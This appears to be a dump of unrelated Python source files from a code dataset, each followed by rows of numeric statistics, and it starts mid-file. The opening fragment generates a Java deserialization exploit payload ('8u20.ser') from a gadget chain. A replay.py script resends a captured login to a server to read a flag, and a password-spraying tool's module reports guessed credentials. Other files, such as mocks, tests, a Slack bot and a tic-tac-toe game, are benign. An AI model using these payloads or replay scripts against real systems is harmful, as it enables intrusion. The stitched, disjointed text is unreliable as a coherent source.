with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
# 向beanContextSupportObject添加beanContextChildPeer属性
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
# 向beanContextSupportObject添加serializable属性
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
# 向beanContextSupportObject添加objectAnnontations 数据
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
# 把beanContextSupportObject对象添加到fake属性里
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
| 43.595745 | 101 | 0.70815 | 142 | 2,049 | 10.161972 | 0.507042 | 0.054054 | 0.066528 | 0.042966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008 | 0.20693 | 2,049 | 46 | 102 | 44.543478 | 0.88 | 0.146901 | 0 | 0 | 0 | 0 | 0.121909 | 0.06383 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17e369dc9f4c67838ee2db6b83ebfbd5715f6650 | 634 | py | Python | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
base31=pow(2,31)
base32=pow(2,32)
base=0xFFFFFFFF
'''
mysql 中processlist和mysql.log中记录的 threadid不一致.因此做一个转换
from :processlist.threadid -> mysql.log.threadid
'''
def long_to_short(pid):
if pid <base31:
return pid
elif base31 <= pid < base32:
return pid -base32
else :
return pid & base
def usage(filename):
print "please use "+filename+ " process_thread"
print "\teg:"+filename+ " 12345"
sys.exit(0)
if __name__ == "__main__":
if len(sys.argv) == 2:
pid =int(sys.argv[1])
print long_to_short(pid)
else:
usage(sys.argv[0])
| 22.642857 | 52 | 0.635647 | 87 | 634 | 4.482759 | 0.563218 | 0.069231 | 0.05641 | 0.071795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057377 | 0.230284 | 634 | 27 | 53 | 23.481481 | 0.741803 | 0.031546 | 0 | 0.095238 | 0 | 0 | 0.089286 | 0 | 0 | 0 | 0.019841 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17e98bdd9410e5ff20a99bb45742f5cb653135df | 4,267 | py | Python | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-06-14T12:03:41.000Z | 2020-02-12T17:07:18.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 45 | 2018-11-12T10:57:30.000Z | 2021-05-26T19:13:12.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-12-19T16:59:04.000Z | 2021-06-20T16:27:43.000Z | import asyncio
import uuid
class MockChannel:
def __init__(self):
self.published = []
self.acked = []
self.nacked = []
async def publish(self, *args, **kwargs):
self.published.append({"args": args, "kwargs": kwargs})
async def basic_client_ack(self, *args, **kwargs):
self.acked.append({"args": args, "kwargs": kwargs})
async def basic_client_nack(self, *args, **kwargs):
self.nacked.append({"args": args, "kwargs": kwargs})
class MockEnvelope:
def __init__(self, uid):
self.delivery_tag = uid
class MockAMQPChannel:
def __init__(self, protocol):
self.protocol = protocol
self.consumers = []
self.closed = False
self.unacked_messages = []
async def basic_qos(self, *args, **kwargs):
pass
async def exchange_declare(self, *args, **kwargs):
pass
async def queue_declare(self, queue_name, *args, **kwargs):
if queue_name not in self.protocol.queues:
self.protocol.queues[queue_name] = []
if "arguments" in kwargs:
arguments = kwargs["arguments"]
if "x-dead-letter-routing-key" in arguments:
self.protocol.dead_mapping[queue_name] = arguments[
"x-dead-letter-routing-key"
]
async def queue_bind(self, *args, **kwargs):
pass
async def _basic_consume(self, handler, queue_name):
while not self.closed:
await asyncio.sleep(0.02)
if queue_name not in self.protocol.queues:
continue
else:
messages = self.protocol.queues[queue_name]
self.protocol.queues[queue_name] = []
self.unacked_messages.extend(messages)
for message in messages:
await handler(
self,
message["message"],
MockEnvelope(message["id"]),
message["properties"],
)
async def basic_client_ack(self, delivery_tag):
for message in self.unacked_messages[:]:
if delivery_tag == message["id"]:
self.unacked_messages.remove(message)
return message
async def basic_client_nack(self, delivery_tag, multiple=False, requeue=False):
message = await self.basic_client_ack(delivery_tag)
if message:
if requeue:
# put back on same queue
self.protocol.queues[message["queue"]].append(message)
else:
new_queue = self.protocol.dead_mapping[message["queue"]]
self.protocol.queues[new_queue].append(message)
async def basic_consume(self, handler, queue_name):
self.consumers.append(
asyncio.ensure_future(self._basic_consume(handler, queue_name))
)
async def publish(
self, message, exchange_name=None, routing_key=None, properties={}
):
if routing_key not in self.protocol.queues:
self.protocol.queues[routing_key] = []
self.protocol.queues[routing_key].append(
{
"id": str(uuid.uuid4()),
"message": message,
"properties": properties,
"queue": routing_key,
}
)
async def close(self):
self.closed = True
await asyncio.sleep(0.06)
class MockAMQPTransport:
def __init__(self):
pass
def close(self):
pass
class MockAMQPProtocol:
def __init__(self):
self.queues = {}
self.dead_mapping = {}
self.closed = False
self.channels = []
async def channel(self):
channel = MockAMQPChannel(self)
self.channels.append(channel)
return channel
async def wait_closed(self):
while not self.closed:
await asyncio.sleep(0.05)
raise GeneratorExit()
async def close(self):
self.closed = True
for channel in self.channels:
await channel.close()
async def send_heartbeat(self):
pass
async def amqp_connection_factory(*args, **kwargs):
return MockAMQPTransport(), MockAMQPProtocol()
| 29.427586 | 83 | 0.574408 | 452 | 4,267 | 5.25885 | 0.205752 | 0.060581 | 0.075726 | 0.031973 | 0.312158 | 0.263778 | 0.181321 | 0.155238 | 0.037863 | 0 | 0 | 0.003463 | 0.323178 | 4,267 | 144 | 84 | 29.631944 | 0.819598 | 0.005156 | 0 | 0.20354 | 0 | 0 | 0.036059 | 0.011784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053097 | false | 0.053097 | 0.017699 | 0 | 0.141593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
17ecb3cdae4406d81c58cf487da09197d576b8b9 | 590 | py | Python | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | from os import environ
from MagiSlack.io import MagiIO
from MagiSlack.module import MagiModule
def hello_world(*args, **kwargs):
return f"HELLO WORLD! user {kwargs['name']}, {kwargs['display_name']}"
if __name__ == '__main__':
print('Magi Start!')
print('='*30)
print('MagiModule Initializing.')
module = MagiModule.MagiModule(environ['SLACK_API_TOKEN'])
print('Complete')
print('='*30)
print('MagiIO Initializing.')
io = MagiIO.MagiIO(module)
print('Complete')
print('='*30)
io.set_callback_func('hello', hello_world)
io.start()
| 21.851852 | 74 | 0.666102 | 71 | 590 | 5.323944 | 0.464789 | 0.079365 | 0.063492 | 0.10582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012371 | 0.177966 | 590 | 26 | 75 | 22.692308 | 0.76701 | 0 | 0 | 0.277778 | 0 | 0 | 0.274576 | 0.040678 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0.055556 | 0.277778 | 0.444444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
17edcea77994ad95b7f15708cbc1815c28e54b7c | 2,234 | py | Python | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | 2 | 2018-04-16T03:08:42.000Z | 2021-01-06T10:21:49.000Z | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | # Copyright (C) 2016-2018 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, calling, equal_to, raises
from mock import patch
from ycmd.server_utils import GetStandardLibraryIndexInSysPath
from ycmd.tests import PathToTestFile
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_ErrorIfNoStandardLibrary_test( *args ):
assert_that(
calling( GetStandardLibraryIndexInSysPath ),
raises( RuntimeError,
'Could not find standard library path in Python path.' ) )
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'standard_library' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindFullStandardLibrary_test( *args ):
assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
@patch( 'sys.path', [
PathToTestFile( 'python-future', 'some', 'path' ),
PathToTestFile( 'python-future', 'embedded_standard_library',
'python35.zip' ),
PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindEmbeddedStandardLibrary_test( *args ):
assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
| 39.192982 | 79 | 0.745748 | 265 | 2,234 | 6.150943 | 0.449057 | 0.066258 | 0.127607 | 0.110429 | 0.407362 | 0.354601 | 0.320245 | 0.203681 | 0.132515 | 0.132515 | 0 | 0.00693 | 0.160251 | 2,234 | 56 | 80 | 39.892857 | 0.86194 | 0.325873 | 0 | 0.433333 | 0 | 0 | 0.195024 | 0.016812 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.1 | true | 0 | 0.3 | 0 | 0.4 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17ee2ab39fa3aef85b71231efdccae35147bec91 | 560 | py | Python | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | import pymsteams
from discord_webhook import DiscordWebhook
from notifiers import get_notifier
def slack(webhook, host):
slack = get_notifier("slack")
slack.notify(message=f"Credentials guessed for host: {host}", webhook_url=webhook)
def teams(webhook, host):
notify = pymsteams.connectorcard(webhook)
notify.text(f"Credentials guessed for host: {host}")
notify.send()
def discord(webhook, host):
notify = DiscordWebhook(
url=webhook, content=f"Credentials guessed for host: {host}"
)
response = webhook.execute()
| 25.454545 | 86 | 0.725 | 68 | 560 | 5.911765 | 0.382353 | 0.08209 | 0.141791 | 0.164179 | 0.223881 | 0.223881 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 560 | 21 | 87 | 26.666667 | 0.866379 | 0 | 0 | 0 | 0 | 0 | 0.201786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17ef674eddb0b6d4127cc6eda09e667c21a0faed | 716 | py | Python | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2018-05-17T02:49:49.000Z | 2019-08-20T02:07:44.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | 2 | 2019-02-13T07:58:23.000Z | 2019-02-13T07:58:27.000Z | manage.py | SinnerSchraderMobileMirrors/django-cms | 157daefd30d9e82cc538a0c226539bf6681beabd | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import sys
from cms.test_utils.cli import configure
from cms.test_utils.tmpdir import temp_dir
import os
def main():
with temp_dir() as STATIC_ROOT:
with temp_dir() as MEDIA_ROOT:
configure(
'sqlite://localhost/cmstestdb.sqlite',
ROOT_URLCONF='cms.test_utils.project.urls',
STATIC_ROOT=STATIC_ROOT,
MEDIA_ROOT=MEDIA_ROOT,
)
from django.core.management import execute_from_command_line
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cms.test_utils.cli")
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
| 27.538462 | 81 | 0.632682 | 89 | 716 | 4.752809 | 0.505618 | 0.066194 | 0.113475 | 0.07565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001908 | 0.268156 | 716 | 25 | 82 | 28.64 | 0.805344 | 0.058659 | 0 | 0 | 0 | 0 | 0.16369 | 0.125 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | true | 0 | 0.277778 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17f3838494cef3ff36c0edabf5b3161b2c576936 | 1,716 | py | Python | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 4 | 2020-06-02T16:25:31.000Z | 2020-07-28T12:26:26.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | 1 | 2020-09-30T10:24:04.000Z | 2020-09-30T10:24:04.000Z | sawyer/flat_goal_env.py | geyang/gym-sawyer | c6e81ab4faefafcfa3886d74672976cc16452747 | [
"MIT"
] | null | null | null | import gym
import numpy as np
# wrapper classes are anti-patterns.
def FlatGoalEnv(env, obs_keys, goal_keys):
"""
We require the keys to be passed in explicitly, to avoid mistakes.
:param env:
:param obs_keys: obs_keys=('state_observation',)
:param goal_keys: goal_keys=('desired_goal',)
"""
goal_keys = goal_keys or []
for k in obs_keys:
assert k in env.observation_space.spaces
for k in goal_keys:
assert k in env.observation_space.spaces
assert isinstance(env.observation_space, gym.spaces.Dict)
_observation_space = env.observation_space
_step = env.step
_reset = env.reset
# TODO: handle nested dict
env._observation_space = _observation_space
env.observation_space = gym.spaces.Box(
np.hstack([_observation_space.spaces[k].low for k in obs_keys]),
np.hstack([_observation_space.spaces[k].high for k in obs_keys]),
)
if len(goal_keys) > 0:
env.goal_space = gym.spaces.Box(
np.hstack([_observation_space.spaces[k].low for k in goal_keys]),
np.hstack([_observation_space.spaces[k].high for k in goal_keys]),
)
# _goal = None
def step(action):
nonlocal obs_keys
obs, reward, done, info = _step(action)
flat_obs = np.hstack([obs[k] for k in obs_keys])
return flat_obs, reward, done, info
def reset():
nonlocal goal_keys
obs = _reset()
# if len(goal_keys) > 0:
# _goal = np.hstack([obs[k] for k in goal_keys])
return np.hstack([obs[k] for k in obs_keys])
# def get_goal(self):
# return _goal
env.step = step
env.reset = reset
return env
| 27.238095 | 78 | 0.634033 | 245 | 1,716 | 4.22449 | 0.244898 | 0.092754 | 0.052174 | 0.043478 | 0.500483 | 0.336232 | 0.336232 | 0.318841 | 0.245411 | 0.197101 | 0 | 0.001586 | 0.265152 | 1,716 | 62 | 79 | 27.677419 | 0.819191 | 0.209207 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016129 | 0.088235 | 1 | 0.088235 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17fa046b5f198637f7b0c78962349041958e3fcc | 689 | py | Python | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | 1 | 2015-12-03T06:16:53.000Z | 2015-12-03T06:16:53.000Z | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | import socket
import config
def main():
# get the login info, which is extracted from the packet
f = open('data/msg.txt', 'r')
msg = f.read()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (config.HOST, config.PORT)
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
sock.sendall(msg) # replay login message
sock.sendall('ls\r\n') # to list the file
sock.sendall('cat flag1\r\n') # to get flag1
# send login
while True:
data = sock.recv(1024)
if data:
print data
print 'Close the socket!'
sock.close()
if __name__ == '__main__':
main()
| 22.966667 | 60 | 0.625544 | 98 | 689 | 4.265306 | 0.520408 | 0.093301 | 0.08134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011742 | 0.258345 | 689 | 29 | 61 | 23.758621 | 0.806262 | 0.16836 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17fa9c27681a820d868dd4675d7bac62973724aa | 424 | py | Python | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | 1 | 2016-09-14T16:33:03.000Z | 2016-09-14T16:33:03.000Z | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | import jtweeter
access_token = "TWITTER_APP_ACCESS_TOKEN"
access_token_secret = "TWITTER_APP_ACCESS_TOKEN_SECRET"
consumer_key = "TWITTER_APP_CONSUMER_KEY"
consumer_secret = "TWITTER_APP_CONSUMER_SECRET"
user_id = 000000000 #user id of twitter user to simulate.
def main():
jtweeter.tweet(access_token, access_token_secret, consumer_key, consumer_secret, user_id)
if __name__ == '__main__':
main() | 32.615385 | 94 | 0.778302 | 57 | 424 | 5.210526 | 0.350877 | 0.222222 | 0.171717 | 0.141414 | 0.319865 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024862 | 0.146226 | 424 | 13 | 95 | 32.615385 | 0.79558 | 0.084906 | 0 | 0 | 0 | 0 | 0.303191 | 0.281915 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa045e92b1da01e687147246d74bf80b0eabb154 | 1,547 | py | Python | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def read_text_file():
# get filename
fname = raw_input('Enter filename: ')
print
# attempt to open file for reading
try:
fobj = open(fname, 'r')
except IOError, e:
print '*** file open error:', e
else:
# display contents to the screen
for eachline in fobj:
print eachline,
fobj.close()
def write_text_file():
import os
ls = os.linesep
fname = ''
# get filename
while True:
fname = raw_input('Input filename: ')
if os.path.exists(fname):
print "ERROR: '%s' already exists" % fname
else:
break
# get file content (text) lines
all_content = []
print "\nEnter lines ('.' by itself quit).\n"
# loop until user terminates input
while True:
entry = raw_input('> ')
if entry == '.':
break
else:
all_content.append(entry)
# write lines to file with proper line-endling
fobj = open(fname, 'w')
fobj.writelines(['%s%s' % (x, ls) for x in all_content])
fobj.close()
print 'DONE!'
if '__main__' == __name__:
item = ''
while True:
print '(1) Write to file'
print '(2) Read from file'
print '(x) Exit'
item = raw_input('> ')
if item == '1':
write_text_file()
elif item == '2':
read_text_file()
elif item == 'x' or item == 'X':
break
else:
continue
| 22.1 | 60 | 0.517776 | 186 | 1,547 | 4.182796 | 0.446237 | 0.041131 | 0.030848 | 0.041131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005051 | 0.360052 | 1,547 | 69 | 61 | 22.42029 | 0.780808 | 0.155139 | 0 | 0.25 | 0 | 0 | 0.143297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.020833 | null | null | 0.1875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa05a5f5d054582877f87be6fff364e1313a693c | 8,894 | py | Python | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | 1 | 2016-09-08T02:32:00.000Z | 2016-09-08T02:32:00.000Z | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
'''
PyTicTacToe - Tic Tac Toe in Python
http://ruel.me
Copyright (c) 2010, Ruel Pagayon - ruel@ruel.me
All rights reserved.
Redistribution and use in source and binary forms, with or without
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of ruel.me nor the names of its contributors
may be used to endorse or promote products derived from this
script without specific prior written permission.
THIS SCRIPT IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL RUEL PAGAYON BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SCRIPT, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
General Description: The CPU difficulty is Human-Like. Means, you can still WIN!
I made it so, because I do not want this to be boring, and
end up with loses and draws.
'''
import os, random, time, operator
'''
Classes
'''
class Player:
'''
Class for players (user and cpu)
'''
def __init__(self, name, weapon):
self.name = name
self.weapon = weapon
self.moves = 0
self.first = False
self.won = False
class BoardCell:
'''
Class for the cells
'''
def __init__(self, number):
self.number = number
self.empty = True
self.content = ' '
def main():
'''
Main Program Flow
'''
recorduser, recordcpu, recorddraw = 0, 0, 0
while True:
# Toss the coin!
won = cointoss()
if won:
user = Player('User', 'X')
cpu = Player('CPU', 'O')
user.first = True
else:
user = Player('User', 'O')
cpu = Player('CPU', 'X')
cpu.first = True
print user.name if user.first else cpu.name, 'goes first.'
# Timeout 5 seconds
print 'Clearing screen in 3 seconds (Get Ready!)'
time.sleep(3)
# Let the game begin
tgame(user, cpu)
# Show the winner
if user.won:
recorduser += 1
winner = user
elif cpu.won:
recordcpu += 1
winner = cpu
else:
recorddraw += 1
winner = Player('DRAW', '-')
print '\nWINNER:', winner.name, '(' + winner.weapon + ')'
print 'Moves:', winner.moves
# Record
print '\nRecord:\tUser:', recorduser, '\n\tCPU:', recordcpu, '\n\tDRAW:', recorddraw
# Play Again?
while True:
choice = raw_input('\nPlay again? [Y]es or [N]o: ')
if choice == 'Y' or choice == 'N':
break
# If yes, clear the screen, else break the loop
if choice == 'Y':
cls()
else:
break
# Print empty space
print
'''
Sub function section
'''
def cointoss():
'''
Coin Toss sub function
'''
won = False
while True:
choice = raw_input('Heads or Tails (H or T): ')
if choice == 'H' or choice == 'T':
print 'Tossing Coin..'
coin = ['Heads', 'Tails'][random.randrange(0, 2)]
print '\n -- ', coin , ' -- \n'
if coin[0] == choice:
won = True
break
return won
def cls():
'''
Clear the screen (works for Windows and UNIX.. so far)
'''
os.system('cls' if os.name == 'nt' else 'clear')
def drawboard(board):
'''
Draw the board for the game
'''
cls()
boardstr = ''
print boardstr + '\n'
i = 0
for row in board:
boardstr += '\t'
if i == 0:
boardstr += ' | | \n\t'
boardstr += ' {0} | {1} | {2}\n'.format(*[cell.content for cell in row])
if i != 2:
boardstr += '\t | | \n\t------|-------|------\n\t | | \n'
else:
boardstr += '\t | | \n'
i += 1
print boardstr
def boardinit():
'''
Initialize the cells on the board
'''
return [[BoardCell((i + 1) + (j * 3)) for i in range(3)] for j in range(3)]
